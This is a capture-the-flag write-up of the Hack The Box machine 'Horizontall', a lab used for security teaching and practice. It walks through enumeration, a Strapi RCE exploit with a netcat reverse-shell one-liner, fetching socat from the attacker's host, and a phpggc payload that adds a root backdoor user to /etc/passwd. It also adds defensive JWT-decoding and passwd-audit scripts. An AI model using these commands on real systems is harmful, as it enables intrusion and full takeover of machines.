Welcome to the Horizontall writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Horizontall
Tags: HTB, Easy, Linux
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -n -sS -T5 -p- 10.10.11.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 11:08 CEST
Nmap scan report for 10.10.11.105
Host is up (0.087s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 65.38 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -Pn -A -p 22,80 10.10.11.105 --script vuln
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 11:16 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.105
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
[...]
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:igor_sysoev:nginx:1.14.0:
| CVE-2019-9513 7.8 https://vulners.com/cve/CVE-2019-9513
| CVE-2019-9511 7.8 https://vulners.com/cve/CVE-2019-9511
| CVE-2018-16844 7.8 https://vulners.com/cve/CVE-2018-16844
| CVE-2018-16843 7.8 https://vulners.com/cve/CVE-2018-16843
| CVE-2021-23017 7.5 https://vulners.com/cve/CVE-2021-23017
| CVE-2019-9516 6.8 https://vulners.com/cve/CVE-2019-9516
| CVE-2018-16845 5.8 https://vulners.com/cve/CVE-2018-16845
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 86.63 ms 10.10.14.1
2 87.81 ms 10.10.11.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.33 seconds
Source Code
Inside the website source code we can find some .js files, and reading the content of http://horizontall.htb/js/app.c68eb462.js reveals a subdomain, api-prod.horizontall.htb:
methods: {
getReviews: function() {
var t = this;
r.a.get("http://api-prod.horizontall.htb/reviews").then((function(s) {
return t.reviews = s.data
}))
}
}
Whatweb
We can identify the software in use, Strapi, with whatweb.
$ whatweb http://api-prod.horizontall.htb/
http://api-prod.horizontall.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[Welcome to your API], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[Strapi <strapi.io>], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.14.0]
Exploitation
Now, searching the internet, we can find this exploit to get unauthenticated RCE.
Let's start a listener in a terminal, run the reverse shell, and hope we get lucky.
$ python3 strapi-rce.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA1MzAwLCJleHAiOjE2MzI5OTczMDB9.TAmtc1S9OFrrle_KBtNSZ9YuRarLsb-wbm1CtcT4mek
$> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8787 >/tmp/f
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
<html>
<head><title>504 Gateway Time-out</title></head>
<body bgcolor="white">
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
$>
Yeah! We have shell as strapi.
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.11.105] 45088
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$
And we can read the user flag.
strapi@horizontall:~/myapi$ ls /home/developer
composer-setup.php myproject user.txt
strapi@horizontall:~/myapi$ cat /home/developer/user.txt
CENSORED_FLAG
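As an added check (not part of the original writeup), the following Python decodes the claims of the JWT printed by the exploit above without verifying its signature: it shows the token carries isAdmin true for user id 3 and is valid for 30 days, which is why a defender cleaning up this box would rotate Strapi's JWT secret rather than only changing the admin password.

```python
import base64
import json
from datetime import datetime, timezone

# The token printed by the exploit output above (copied from this writeup).
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA1MzAwLCJleHAiOjE2MzI5OTczMDB9."
         "TAmtc1S9OFrrle_KBtNSZ9YuRarLsb-wbm1CtcT4mek")


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token: str) -> dict:
    """Return header, claims and lifetime of a JWT WITHOUT checking the signature.

    This only reports what the token says about itself; proving it is valid
    for a given server requires that server's signing secret.
    """
    try:
        header_b64, payload_b64, _signature_b64 = token.split(".")
    except ValueError:
        raise ValueError("not a three-part JWT") from None
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    lifetime_days = None
    if "iat" in claims and "exp" in claims:
        lifetime_days = (claims["exp"] - claims["iat"]) / 86400
    return {"header": header, "claims": claims, "lifetime_days": lifetime_days}


if __name__ == "__main__":
    info = decode_jwt_unverified(TOKEN)
    print("header:", json.dumps(info["header"]))
    print("claims:", json.dumps(info["claims"]))
    exp = datetime.fromtimestamp(info["claims"]["exp"], tz=timezone.utc)
    print(f"isAdmin={info['claims'].get('isAdmin')}, "
          f"valid for {info['lifetime_days']:.0f} days, until {exp:%Y-%m-%d} UTC")
```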
Post exploitation
Enumeration
Netstat
If we list the listening ports, we find port 8000 listening only on localhost.
strapi@horizontall:~/.pm2$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1811/node /usr/bin/ off (0.00/0/0)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN - off (0.00/0/0)
[...]
Running curl against the port shows that a Laravel version 8 installation (PHP 7.4.18) is served there.
strapi@horizontall:~$ curl 127.0.0.1:8000
<!DOCTYPE html>
[...]
<div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
Laravel v8 (PHP v7.4.18)
</div>
[...]
Looking around on the internet, we can find this exploit.
Privilege escalation: strapi to root
Preparations
In order to use the exploit, we need to forward port 8000 so that we can reach it from our machine. For this we are going to use socat.
First we upload the binary to the machine.
strapi@horizontall:~$ wget 10.10.14.5/socat
--2021-08-31 11:34:58-- http://10.10.14.5/socat
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 378384 (370K) [application/octet-stream]
Saving to: ‘socat’
socat 100%[==============================================>] 369.52K 296KB/s in 1.2s
2021-08-31 11:35:00 (296 KB/s) - ‘socat’ saved [378384/378384]
Now we create the tunnel. Note that socat listens on port 8001 on all interfaces and forwards to port 8000 on localhost, so the internal Laravel service becomes reachable by anyone who can reach the box on port 8001.
strapi@horizontall:~$ ./socat tcp-l:8001,fork,reuseaddr tcp:localhost:8000
And we connect to it.
$ nc 10.10.11.105 8001
Exploitation
The first step is to create our payload using phpggc, which we can get from this repository.
The payload we are going to create appends a user with root privileges (UID 0) to the /etc/passwd file.
$ php -d'phar.readonly=0' ./phpggc/phpggc --phar phar -o exploit.phar --fast-destruct monolog/rce1 system 'echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd'
Now it is time to run the exploit.
$ python3 laravel2.py http://10.10.11.105:8001/ exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
Exploit succeeded
+ Logs cleared
Perfect! Now we only have to authenticate as the injected user and read the root flag.
strapi@horizontall:~$ su x4v1l0k
Password:
root@horizontall:/opt/strapi# id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:/opt/strapi# cd
root@horizontall:~# cat root.txt
CENSORED_FLAG
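From the defender's side, the persistence left behind by the phpggc payload above (an extra UID 0 account with its hash stored directly in /etc/passwd) is easy to spot. The following Python audit is an added example, not part of the original writeup; the sample passwd content is constructed and only its last line comes from the payload in this page.

```python
from typing import List, Tuple

# Constructed sample (not dumped from the box): a small passwd file ending
# with the exact line the phpggc payload above appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
strapi:x:1001:1001::/opt/strapi:/bin/bash
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
"""

Finding = Tuple[int, str, str]  # (line number, account name, reason)


def audit_passwd(text: str) -> List[Finding]:
    """Flag passwd entries that look like a backdoor account.

    Checks: any account other than root with UID 0, a password hash kept in
    passwd instead of /etc/shadow (what the payload above does, because it
    bypasses useradd/passwd), an empty password field, and malformed lines.
    """
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, line[:32], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric uid"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((lineno, name, "uid 0 account that is not root"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((lineno, name, "password hash stored in passwd, not shadow"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Finding]:
    # Same checks against a real file on the host being reviewed.
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {reason}")
```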